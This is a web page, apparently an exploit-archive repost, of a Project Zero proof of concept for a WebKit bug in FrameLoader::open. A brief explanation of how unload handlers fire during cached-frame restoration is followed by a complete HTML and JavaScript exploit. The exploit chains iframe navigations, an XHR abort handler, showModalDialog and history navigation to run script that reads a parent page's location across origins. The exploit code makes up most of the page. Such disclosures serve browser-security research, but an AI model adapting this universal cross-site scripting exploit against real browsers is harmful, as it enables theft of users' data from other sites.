扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 |
<!-- Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1197 This is similar to the case https://bugs.chromium.org/p/project-zero/issues/detail?id=1151. But this time, javascript handlers may be fired in FrameLoader::open. void FrameLoader::open(CachedFrameBase& cachedFrame) { ... clear(document, true, true, cachedFrame.isMainFrame()); <<--------- prepareForDestruction which fires unloads events is called. ... } PoC: --> <html> <body> Click anywhere... <script> function createURL(data, type = 'text/html') { return URL.createObjectURL(new Blob([data], {type: type})); } function navigate(w, url) { let a = w.document.createElement('a'); a.href = url; a.click(); } window.onclick = () => { window.w = open('about:blank', 'w', 'width=500, height=500'); let i0 = w.document.body.appendChild(document.createElement('iframe')); let i1 = w.document.body.appendChild(document.createElement('iframe')); i0.contentWindow.onbeforeunload = () => { i0.contentWindow.onbeforeunload = null; navigate(w, 'about:blank'); }; navigate(i0.contentWindow, createURL(<code> <body> <script> </scrip</code> + 't></body>')); setTimeout(() => { let g = i0.contentDocument.body.appendChild(document.createElement('iframe')); let x = new g.contentWindow.XMLHttpRequest(); x.onabort = () => { parseFloat('axfasdfasfdsfasfsfasdf'); i0.contentDocument.write(); navigate(w, 'https://abc.xyz/'); showModalDialog(createURL(<code> <script> let it = setInterval(() => { try { opener.w.document.x; } catch (e) { clearInterval(it); window.close(); } }, 10); </scrip</code> + 't>')); setTimeout(() => { i1.srcdoc = '<script>alert(parent.location);</scrip' + 't>'; navigate(i1.contentWindow, 'about:srcdoc'); }, 10); }; x.open('GET', createURL('x'.repeat(0x1000000))); x.send(); w.history.go(-2); }, 200); }; </script> </body> </html> |
体验盒子
